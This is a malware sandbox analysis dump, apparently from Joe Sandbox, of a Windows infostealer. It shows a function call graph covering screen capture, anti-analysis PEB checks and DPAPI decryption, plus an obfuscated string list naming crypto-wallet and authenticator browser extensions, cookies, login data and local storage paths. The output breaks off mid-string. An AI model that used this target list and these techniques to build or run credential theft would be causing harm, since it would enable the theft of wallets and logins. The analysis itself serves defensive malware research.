73769->73763 73769->73764 73769->73765 73769->73766 73769->73768 73770 41f9a4 58 API calls 73769->73770 73911 41d057 73769->73911 73917 44be84 43 API calls __wfreopen_s 73769->73917 73918 4360e1 73769->73918 73770->73769 73788 434090 _unexpected _wctomb_s _strlen 73773->73788 73774 434f14 RegCloseKey 73774->73788 73775 434be9 RegQueryValueExW 73775->73788 73776 4349e7 73776->73684 73777 434f73 RegCloseKey 73777->73788 73778 434d8e RegOpenKeyExW 73778->73788 73779 4346ce wsprintfW 73779->73788 73780 434706 RegEnumKeyExW 73780->73788 73781 434758 RegCloseKey 73781->73788 73782 434954 RegOpenKeyExW 73782->73788 73783 434080 127 API calls 73783->73788 73784 434ce5 wsprintfW 73784->73788 73786 419e6b 127 API calls 73786->73788 73787 447a80 14 API calls ___std_exception_copy 73787->73788 73788->73774 73788->73775 73788->73776 73788->73777 73788->73778 73788->73779 73788->73780 73788->73781 73788->73782 73788->73783 73788->73784 73788->73786 73788->73787 73923 419496 106 API calls 3 library calls 73788->73923 73790 433c23 73789->73790 73792 419e6b 127 API calls 73790->73792 73793 434022 GetProcessHeap RtlFreeHeap 73790->73793 73794 433d34 73790->73794 73795 4338b5 198 API calls 73790->73795 73797 43323b 198 API calls 73790->73797 73924 430e6c 73790->73924 73945 43350d 200 API calls 73790->73945 73946 432718 73790->73946 73792->73790 73793->73684 73794->73794 73795->73790 73797->73790 73800 421f01 73799->73800 73801 4220b5 GetPEB 73800->73801 73802 421f6c NtQueryInformationProcess 73800->73802 73804 42215d 73800->73804 73995 4279e0 73800->73995 73801->73800 73802->73800 73804->73684 73806 4224b4 73805->73806 73807 422795 GetPEB 73806->73807 73808 4227be NtQueryInformationProcess 73806->73808 73809 4279e0 GetPEB 73806->73809 73810 422802 73806->73810 73807->73806 73808->73806 73809->73806 73810->73684 73812 42cfd0 73811->73812 73813 42d5bb 73812->73813 73814 419b9d 72 API calls 73812->73814 73815 42cfba 223 API calls 73812->73815 73816 42b9ae 206 API calls 73812->73816 73818 42b9c5 223 API calls 73812->73818 73820 42c0da 223 API calls 73812->73820 73821 41a28f 182 API calls 73812->73821 74000 42ca0d 73812->74000 74015 42ad82 73812->74015 73813->73684 73814->73812 73815->73812 73816->73812 73818->73812 73820->73812 73821->73812 73836 4262bc __fread_nolock 73822->73836 73823 426847 RtlAdjustPrivilege 73826 4279e0 GetPEB 73823->73826 73824 426972 73835 422177 55 API calls 73824->73835 73824->73836 74069 424c44 GetModuleFileNameW CreateFileW CloseHandle 73824->74069 73825 422817 17 API calls 73825->73836 73826->73836 73828 4279e0 GetPEB 73828->73836 73829 426600 GetPEB 73829->73836 73831 4263c1 LoadLibraryA 73831->73836 73833 4269dc 73833->73684 73835->73824 73836->73823 73836->73824 73836->73825 73836->73828 73836->73829 73836->73831 73836->73833 73837 41f9a4 55 API calls 73836->73837 73838 4244e4 3 API calls 73836->73838 74066 41eb3f RaiseException 73836->74066 74067 424995 20 API calls ___std_exception_copy 73836->74067 74068 426a42 GetPEB GetPEB 73836->74068 73837->73836 73838->73836 73839->73710 73845 401c31 73840->73845 73841 401ebc GetSystemTimeAsFileTime 73841->73845 73842 402fcc 7 API calls 73842->73845 73843 401ff9 7 API calls 73843->73845 73844 401c1e 7 API calls 73844->73845 73845->73841 73845->73842 73845->73843 73845->73844 73846 401f62 __aulldiv 73845->73846 73846->73728 73858 41f9bc 73847->73858 73848 42162a GetProcessId 73848->73858 73849 421bb3 NtQuerySystemInformation 73849->73858 73850 421bff NtQuerySystemInformation 73850->73858 73852 41f916 GetPEB VirtualQuery 73852->73858 73854 420e2d NtClose 73854->73858 73855 4245ec 51 API calls 73855->73858 73856 420a7a GetPEB 73856->73858 73857 421eeb NtQueryInformationProcess GetPEB GetPEB 73857->73858 73858->73848 73858->73849 73858->73850 73858->73852 73858->73854 73858->73855 73858->73856 73858->73857 73859 421ee3 73858->73859 73861 4202ad GetCurrentProcessId 73858->73861 73862 447a80 ___std_exception_copy 14 API calls 73858->73862 73863 420593 NtDuplicateObject 73858->73863 73865 447e24 ___std_exception_copy 15 API calls 73858->73865 73866 4269e4 GetPEB GetPEB 73858->73866 73867 4228cf 51 API calls 73858->73867 73868 41f9a4 51 API calls 73858->73868 73869 422817 17 API calls 73858->73869 73872 41f536 51 API calls 73858->73872 73873 4224a3 GetPEB NtQueryInformationProcess GetPEB 73858->73873 73874 4262a1 51 API calls 73858->73874 73875 4279e0 GetPEB 73858->73875 73877 426a42 GetPEB GetPEB 73858->73877 73878 4244e4 3 API calls 73858->73878 73880 422177 51 API calls 73858->73880 73881 424995 20 API calls 73858->73881 73882 424b24 GetPEB HeapDestroy 73858->73882 73883 420bb6 73858->73883 73884 44814e 73858->73884 73897 424c8d 58 API calls ___std_exception_copy 73858->73897 73898 41eb3f RaiseException 73858->73898 73906 41ebeb 58 API calls 73858->73906 73907 41e6f0 58 API calls 73858->73907 73859->73753 73861->73858 73862->73858 73863->73858 73865->73858 73866->73858 73867->73858 73868->73858 73869->73858 73872->73858 73873->73858 73874->73858 73875->73858 73877->73858 73878->73858 73880->73858 73881->73858 73882->73858 73883->73858 73899 424c44 GetModuleFileNameW CreateFileW CloseHandle 73883->73899 73900 424bed GetPEB GetModuleFileNameW CreateFileW CloseHandle 73883->73900 73901 4228cf 73883->73901 73885 45699f 73884->73885 73886 4569b7 73885->73886 73887 4569ac 73885->73887 73889 4569bf 73886->73889 73895 4569c8 _unexpected 73886->73895 73888 44eb6f __fread_nolock 15 API calls 73887->73888 73894 4569b4 73888->73894 73890 44e224 __freea 14 API calls 73889->73890 73890->73894 73891 4569f2 RtlReAllocateHeap 73891->73894 73891->73895 73892 4569cd 73908 4447a4 14 API calls __dosmaperr 73892->73908 73894->73858 73895->73891 73895->73892 73909 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 73895->73909 73897->73858 73898->73858 73899->73883 73900->73883 73902 422958 73901->73902 73910 424995 20 API calls ___std_exception_copy 73902->73910 73904 4244a9 73905 4262a1 58 API calls 73904->73905 73905->73904 73906->73858 73907->73858 73908->73894 73909->73895 73910->73904 73912 447e24 ___std_exception_copy 15 API calls 73911->73912 73913 41d065 73912->73913 73914 438e28 3 API calls 73913->73914 73915 41d079 GetCurrentHwProfileA 73914->73915 73916 41d083 73915->73916 73916->73769 73917->73769 73922 436133 73918->73922 73919 447e24 ___std_exception_copy 15 API calls 73919->73922 73920 43669e 73920->73769 73921 4360e1 15 API calls 73921->73922 73922->73919 73922->73920 73922->73921 73923->73788 73940 430e85 73924->73940 73925 4321e3 GetDIBits ReleaseDC 73925->73940 73926 431e4c GetObjectW 73926->73940 73927 4325bf GetProcessHeap 73927->73940 73928 432097 GetProcessHeap 73928->73940 73929 431d2b RtlAllocateHeap 73929->73940 73930 432b1b 186 API calls 73930->73940 73931 4228cf 58 API calls 73931->73940 73932 431c69 GetDC 73932->73940 73933 4314b2 GetProcessHeap 73933->73940 73934 4314e4 HeapAlloc 73934->73940 73935 4326e0 GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 73935->73790 73936 431902 73937 430e6c 186 API calls 73937->73940 73938 430f3a RtlAllocateHeap 73938->73940 73939 433c10 186 API calls 73939->73940 73940->73925 73940->73926 73940->73927 73940->73928 73940->73929 73940->73930 73940->73931 73940->73932 73940->73933 73940->73934 73940->73935 73940->73936 73940->73937 73940->73938 73940->73939 73941 43350d 186 API calls 73940->73941 73942 43323b 186 API calls 73940->73942 73943 4338b5 186 API calls 73940->73943 73944 432718 186 API calls 73940->73944 73941->73940 73942->73940 73943->73940 73944->73940 73945->73790 73956 43272e 73946->73956 73947 432a26 BitBlt 73947->73956 73948 432a76 CreateCompatibleBitmap 73948->73956 73949 432a0e SelectObject 73949->73956 73950 432a5b SelectObject 73950->73956 73951 432943 73952 432afb DeleteDC DeleteObject 73952->73790 73953 432893 CreateCompatibleDC 73953->73956 73954 4338b5 193 API calls 73954->73956 73956->73947 73956->73948 73956->73949 73956->73950 73956->73951 73956->73952 73956->73953 73956->73954 73957 430e6c 193 API calls 73956->73957 73959 432718 193 API calls 73956->73959 73960 432b1b 73956->73960 73972 43350d 200 API calls 73956->73972 73957->73956 73959->73956 73968 432b24 73960->73968 73961 432eb3 SystemParametersInfoW 73961->73968 73962 43302c GetDesktopWindow GetDC 73962->73968 73963 43350d 197 API calls 73963->73968 73964 433c10 197 API calls 73964->73968 73965 432fe8 73965->73956 73966 432b1b 197 API calls 73966->73968 73967 4338b5 197 API calls 73967->73968 73968->73961 73968->73962 73968->73963 73968->73964 73968->73965 73968->73966 73968->73967 73969 432718 197 API calls 73968->73969 73970 430e6c 197 API calls 73968->73970 73973 43323b 73968->73973 73969->73968 73970->73968 73972->73956 73981 433253 73973->73981 73974 433448 73975 43341c GetSystemMetrics 73975->73981 73976 432718 196 API calls 73976->73981 73977 4334f3 DeleteDC 73977->73968 73978 4333c1 GetSystemMetrics 73978->73981 73979 43327e CreateDCW 73979->73981 73980 43350d 196 API calls 73980->73981 73981->73974 73981->73975 73981->73976 73981->73977 73981->73978 73981->73979 73981->73980 73983 4338b5 73981->73983 73984 4338cd 73983->73984 73985 43323b 199 API calls 73984->73985 73986 432718 199 API calls 73984->73986 73987 4338b5 199 API calls 73984->73987 73988 433c10 199 API calls 73984->73988 73989 432b1b 199 API calls 73984->73989 73990 433be8 73984->73990 73991 4339bb 73984->73991 73993 430e6c 199 API calls 73984->73993 73985->73984 73986->73984 73987->73984 73988->73984 73989->73984 73992 430e6c 199 API calls 73990->73992 73991->73991 73994 433bfc DeleteObject 73992->73994 73993->73984 73994->73981 73996 4279fe 73995->73996 73998 428317 73996->73998 73999 428334 GetPEB 73996->73999 73998->73800 73999->73996 74008 42ca20 74000->74008 74001 40e14e 161 API calls 74001->74008 74002 42ca0d 223 API calls 74002->74008 74004 42cfa7 74010 447a80 ___std_exception_copy 14 API calls 74004->74010 74005 447e24 ___std_exception_copy 15 API calls 74005->74008 74006 42ad82 223 API calls 74006->74008 74007 42cb4e 74008->74001 74008->74002 74008->74004 74008->74005 74008->74006 74008->74007 74009 42cfba 223 API calls 74008->74009 74011 438e28 3 API calls 74008->74011 74014 40b7bb 43 API calls 74008->74014 74032 42b9ae 74008->74032 74035 42b9c5 74008->74035 74009->74008 74013 42cfb2 74010->74013 74011->74008 74013->73812 74014->74008 74031 42ad95 74015->74031 74016 447a80 ___std_exception_copy 14 API calls 74016->74031 74018 42b9ae 206 API calls 74018->74031 74019 42b7f1 74020 447e24 15 API calls ___std_exception_copy 74020->74031 74021 42b99e 74022 447a80 ___std_exception_copy 14 API calls 74021->74022 74026 42b9a6 74022->74026 74023 42b9c5 223 API calls 74023->74031 74024 42cfba 223 API calls 74024->74031 74025 42ad82 223 API calls 74025->74031 74026->73812 74027 438e28 LoadLibraryW GetPEB lstrcmpiW 74027->74031 74028 40b7bb 43 API calls 74028->74031 74029 42ca0d 223 API calls 74029->74031 74030 40e14e 161 API calls 74030->74031 74031->74016 74031->74018 74031->74019 74031->74020 74031->74021 74031->74023 74031->74024 74031->74025 74031->74027 74031->74028 74031->74029 74031->74030 74049 42c0da 74031->74049 74033 430228 206 API calls 74032->74033 74034 42b9c1 74033->74034 74034->74008 74047 42b9d5 74035->74047 74036 42ca0d 223 API calls 74036->74047 74037 42b9c5 223 API calls 74037->74047 74038 42c04f 74039 42ad82 223 API calls 74039->74047 74040 447e24 ___std_exception_copy 15 API calls 74040->74047 74041 438e28 3 API calls 74041->74047 74042 42c0ca 74044 447a80 ___std_exception_copy 14 API calls 74042->74044 74043 42b9ae 206 API calls 74043->74047 74045 42c0d2 74044->74045 74045->74008 74046 40b7bb 43 API calls 74046->74047 74047->74036 74047->74037 74047->74038 74047->74039 74047->74040 74047->74041 74047->74042 74047->74043 74047->74046 74048 40e14e 161 API calls 74047->74048 74048->74047 74065 42c0ed 74049->74065 74050 42c878 74050->74050 74051 42c0da 223 API calls 74051->74065 74052 40b7bb 43 API calls 74052->74065 74053 42ad82 223 API calls 74053->74065 74054 42c9fd 74059 447a80 ___std_exception_copy 14 API calls 74054->74059 74055 42b9ae 206 API calls 74055->74065 74056 447a80 14 API calls ___std_exception_copy 74056->74065 74057 447e24 15 API calls ___std_exception_copy 74057->74065 74058 42cfba 223 API calls 74058->74065 74062 42ca05 74059->74062 74060 40e14e 161 API calls 74060->74065 74061 438e28 3 API calls 74061->74065 74062->74031 74063 42b9c5 223 API calls 74063->74065 74064 42ca0d 223 API calls 74064->74065 74065->74050 74065->74051 74065->74052 74065->74053 74065->74054 74065->74055 74065->74056 74065->74057 74065->74058 74065->74060 74065->74061 74065->74063 74065->74064 74066->73836 74067->73836 74069->73824 74070->73690 74071->73690 74073 443a37 74072->74073 74074 443a49 74072->74074 74099 4438d3 GetModuleHandleW 74073->74099 74084 443b8c 74074->74084 74077 443a3c 74077->74074 74100 443916 GetModuleHandleExW 74077->74100 74079 43ca83 74079->73659 74083 443a9b 74085 443b98 ___scrt_is_nonwritable_in_current_image 74084->74085 74106 44d13d EnterCriticalSection 74085->74106 74087 443ba2 74107 443aa1 74087->74107 74089 443baf 74111 443bcd 74089->74111 74092 4439ba 74116 443998 74092->74116 74095 4439d8 74097 443916 CallUnexpected 3 API calls 74095->74097 74096 4439c8 GetCurrentProcess TerminateProcess 74096->74095 74098 4439e0 ExitProcess 74097->74098 74099->74077 74101 443955 GetProcAddress 74100->74101 74102 443976 74100->74102 74101->74102 74103 443969 74101->74103 74104 443985 74102->74104 74105 44397c FreeLibrary 74102->74105 74103->74102 74104->74074 74105->74104 74106->74087 74108 443aad ___scrt_is_nonwritable_in_current_image 74107->74108 74110 443b14 CallUnexpected 74108->74110 74114 44446f 14 API calls 2 library calls 74108->74114 74110->74089 74115 44d154 LeaveCriticalSection 74111->74115 74113 443a80 74113->74079 74113->74092 74114->74110 74115->74113 74121 44fb15 GetPEB 74116->74121 74119 4439a2 GetPEB 74120 4439b4 74119->74120 74120->74095 74120->74096 74122 44399d 74121->74122 74123 44fb2f 74121->74123 74122->74119 74122->74120 74125 44ced5 74123->74125 74128 44cfe0 74125->74128 74129 44d00e 74128->74129 74134 44cef1 74128->74134 74129->74134 74135 44cf15 74129->74135 74132 44d028 GetProcAddress 74133 44d038 _unexpected 74132->74133 74132->74134 74133->74134 74134->74122 74136 44cf26 ___vcrt_FlsFree 74135->74136 74137 44cfbc 74136->74137 74138 44cf44 LoadLibraryExW 74136->74138 74142 44cf92 LoadLibraryExW 74136->74142 74137->74132 74137->74134 74139 44cfc3 74138->74139 74140 44cf5f GetLastError 74138->74140 74139->74137 74141 44cfd5 FreeLibrary 74139->74141 74140->74136 74141->74137 74142->74136 74142->74139 74143 88003c 74144 880049 74143->74144 74158 880e0f SetErrorMode SetErrorMode 74144->74158 74149 880265 74150 8802ce VirtualProtect 74149->74150 74152 88030b 74150->74152 74151 880439 VirtualFree 74155 8805f4 LoadLibraryA 74151->74155 74157 8804be 74151->74157 74152->74151 74153 8804e3 LoadLibraryA 74153->74157 74156 8808c7 74155->74156 74157->74153 74157->74155 74159 880223 74158->74159 74160 880d90 74159->74160 74161 880dad 74160->74161 74162 880dbb GetPEB 74161->74162 74163 880238 VirtualAlloc 74161->74163 74162->74163 74163->74149 74164 450330 74169 45033d _unexpected 74164->74169 74165 450368 RtlAllocateHeap 74167 45037b 74165->74167 74165->74169 74166 45037d 74172 4447a4 14 API calls __dosmaperr 74166->74172 74169->74165 74169->74166 74171 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 74169->74171 74171->74169 74172->74167 74173 404c06 74174 404c19 74173->74174 74179 40a3c6 74174->74179 74177 404c25 74178 404c66 74177->74178 74184 4040f8 16 API calls _strlen 74177->74184 74180 40a428 74179->74180 74181 40a45a 74179->74181 74182 447e24 15 API calls 74180->74182 74183 44eb6f 15 API calls 74180->74183 74181->74177 74182->74181 74183->74181 74184->74177 74185 426b04 74186 426b49 __fread_nolock 74185->74186 74187 426f39 74186->74187 74188 447e24 ___std_exception_copy 15 API calls 74186->74188 74189 447a80 ___std_exception_copy 14 API calls 74187->74189 74188->74186 74190 426f52 74189->74190 74191 979ade 74192 979aed 74191->74192 74195 97a27e 74192->74195 74197 97a299 74195->74197 74196 97a2a2 CreateToolhelp32Snapshot 74196->74197 74198 97a2be Module32First 74196->74198 74197->74196 74197->74198 74199 97a2cd 74198->74199 74201 979af6 74198->74201 74202 979f3d 74199->74202 74203 979f68 74202->74203 74204 979f79 VirtualAlloc 74203->74204 74205 979fb1 74203->74205 74204->74205 74206 4052d9 74207 4052ee __fread_nolock 74206->74207 74208 405900 74207->74208 74210 438e28 3 API calls 74207->74210 74211 40b129 43 API calls 74207->74211 74213 438e28 3 API calls 74207->74213 74214 447e24 15 API calls ___std_exception_copy 74207->74214 74218 447a80 ___std_exception_copy 14 API calls 74207->74218 74219 4035d1 45 API calls 74207->74219 74220 405aaa 74207->74220 74240 434fac 74207->74240 74210->74207 74211->74207 74215 405567 CryptUnprotectData 74213->74215 74214->74207 74217 447a80 ___std_exception_copy 14 API calls 74215->74217 74217->74207 74218->74207 74219->74207 74233 405ac3 _unexpected 74220->74233 74221 405ebc lstrcatW 74225 4360e1 15 API calls 74221->74225 74222 406018 lstrcatW 74222->74233 74223 4060e6 74224 405eed lstrcatW 74231 4360e1 15 API calls 74224->74231 74230 405ed0 lstrcatW lstrcatW 74225->74230 74227 405be7 lstrcatW 74227->74233 74229 403600 101 API calls 74229->74233 74230->74233 74234 405eff lstrcatW lstrcatW 74231->74234 74232 405bb6 74236 4360e1 15 API calls 74232->74236 74233->74221 74233->74222 74233->74223 74233->74224 74233->74227 74233->74229 74233->74232 74246 404edc 16 API calls 74233->74246 74247 4048e2 46 API calls 74233->74247 74248 404988 46 API calls 74233->74248 74234->74233 74237 4061ef 74236->74237 74238 40e14e 161 API calls 74237->74238 74239 406203 74238->74239 74239->74207 74241 434fc2 _strcat _strncpy _strlen 74240->74241 74242 434fac 15 API calls 74241->74242 74243 447e24 ___std_exception_copy 15 API calls 74241->74243 74244 435e8e 74241->74244 74245 4360e1 15 API calls 74241->74245 74242->74241 74243->74241 74244->74207 74245->74241 74246->74233 74247->74233 74248->74233 74249 4102de 74250 44814e 16 API calls 74249->74250 74251 4102f1 74250->74251
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?), ref: 00406AFC
                                                              • lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
                                                              • lstrcatW.KERNEL32(?,?,?), ref: 00408A66
                                                              • lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70
                                                              Strings
                                                              • nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
                                                              • Le576xedaf, xrefs: 00407881
                                                              • UL6T, xrefs: 0040702D
                                                              • Te576xedmple, xrefs: 00408068
                                                              • Ste576xedem Key576xedchain, xrefs: 0040827B
                                                              • infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
                                                              • GAu576xedth Authe576xednticator, xrefs: 00407298
                                                              • EeS, xrefs: 00407043
                                                              • \Local Storage\leveldb, xrefs: 00406AFE
                                                              • aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
                                                              • bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
                                                              • Coinb576xedase, xrefs: 004083FB
                                                              • jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
                                                              • Wom576xedbat, xrefs: 004077AD
                                                              • kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
                                                              • EQ576xedUAL, xrefs: 004076A5
                                                              • His576xedtory, xrefs: 004083AF
                                                              • Bi576xedtClip, xrefs: 00407FD4
                                                              • Ja576xedxx Lib576xederty, xrefs: 0040881F
                                                              • nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
                                                              • Ron576xedin Wall576xedet, xrefs: 004085CE
                                                              • cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
                                                              • kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
                                                              • onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
                                                              • Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
                                                              • ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
                                                              • Tro576xednLi576xednk, xrefs: 00407616
                                                              • Te576xedrra Stat576xedion, xrefs: 0040724B
                                                              • fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
                                                              • nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
                                                              • Coi576xedn98, xrefs: 00407492
                                                              • ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
                                                              • ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
                                                              • Au576xedthy, xrefs: 00406CF1
                                                              • Na576xedsh Ex576xedtension, xrefs: 0040809F
                                                              • imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
                                                              • Sa576xedturn, xrefs: 00407C8A
                                                              • Ke576xedplr, xrefs: 004084A0
                                                              • nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
                                                              • Pol576xedymesh, xrefs: 004075AC
                                                              • kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
                                                              • ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
                                                              • mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
                                                              • afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
                                                              • jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
                                                              • gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
                                                              • EnK576xedrypt, xrefs: 00408897
                                                              • bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
                                                              • Lo576xedgin Da576xedta, xrefs: 0040864F
                                                              • Uni576xedSat, xrefs: 004082D2
                                                              • bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
                                                              • Pha576xedntom, xrefs: 0040822F
                                                              • Au576xedro, xrefs: 00407584
                                                              • cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
                                                              • ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
                                                              • amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
                                                              • Gu576xedild, xrefs: 004081EB
                                                              • Cl576xedover, xrefs: 004087AC
                                                              • bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
                                                              • cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
                                                              • /BrowserDB, xrefs: 00408A68
                                                              • One576xedKey, xrefs: 00407859
                                                              • Te576xedzBox, xrefs: 00407F84
                                                              • ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
                                                              • Cy576xedano, xrefs: 00407AE5
                                                              • oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
                                                              • W576xedeb Da576xedta, xrefs: 00408697
                                                              • hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
                                                              • iW576xedlt, xrefs: 0040886F
                                                              • Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
                                                              • ME576xedW CX, xrefs: 004073DD
                                                              • fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
                                                              • Ma576xedth, xrefs: 004083D3
                                                              • dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
                                                              • kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
                                                              • EeS, xrefs: 00406B7F
                                                              • Nab576xedox, xrefs: 00408018
                                                              • E576xedOS Authenti576xedcator, xrefs: 00406D19
                                                              • Gua576xedrda, xrefs: 00408423
                                                              • NeoL576xedine, xrefs: 00407CB2
                                                              • lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
                                                              • lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
                                                              • Yo576xedroi, xrefs: 00408143
                                                              • By576xedone, xrefs: 004076ED
                                                              • Sol576xedlet, xrefs: 004088F4
                                                              • Liqu576xedality, xrefs: 00407EDD
                                                              • nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
                                                              • Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
                                                              • nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
                                                              • Hist576xedory, xrefs: 0040867F
                                                              • fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
                                                              • hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
                                                              • dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
                                                              • aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
                                                              • Aut576xedhenti576xedcator, xrefs: 004074BA
                                                              • Ni576xedfty, xrefs: 0040816B
                                                              • ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
                                                              • flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
                                                              • KH576xedC, xrefs: 00408040
                                                              • hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
                                                              • Netw576xedork\Cook576xedies, xrefs: 00408505
                                                              • nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
                                                              • fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
                                                              • Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
                                                              • ICO576xedNex, xrefs: 004075D4
                                                              • DAp576xedpPlay, xrefs: 00407FAC
                                                              • Tr576xedezor Passw576xedord Manager, xrefs: 00408207
                                                              • cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
                                                              • VL6T, xrefs: 004076C1
                                                              • Bit576xedApp, xrefs: 00408847
                                                              • VL6T, xrefs: 0040891C
                                                              • Zi576xedlPay, xrefs: 0040746A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho5